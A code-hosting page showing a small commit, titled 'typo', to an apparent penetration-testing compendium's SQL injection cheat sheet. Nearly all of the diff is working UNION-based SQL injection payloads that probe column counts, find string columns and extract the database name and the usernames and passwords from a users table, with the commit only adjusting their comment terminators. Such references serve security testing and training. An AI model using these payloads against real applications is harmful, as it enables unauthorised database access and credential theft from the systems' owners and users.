whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

typo

This commit is contained in:
gurkenhabicht 2023-08-26 16:06:40 +02:00
parent c2637a001d
commit 3834c1617e
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
Exploits/Databases/SQL Injection.md
View File

@ -85,24 +85,24 @@ Check the number of columns by inserting NULL values one after another.
* Check number of cols
```sql
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL-- -
' UNION SELECT NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL-- -
# until the error occurs
```
* Check which one contains String values
```sql
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
' UNION SELECT 'a',NULL,NULL,NULL -- -
' UNION SELECT NULL,'a',NULL,NULL -- -
' UNION SELECT NULL,NULL,'a',NULL -- -
' UNION SELECT NULL,NULL,NULL,'a' -- -
```
* Retrieve content, for cols as an example, or dump database
```sql
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- - //
' UNION SELECT NULL,username,password,NULL FROM users -- - //
```
* Retrieve content by union poking the count and order of columns, afterwards extracting tables via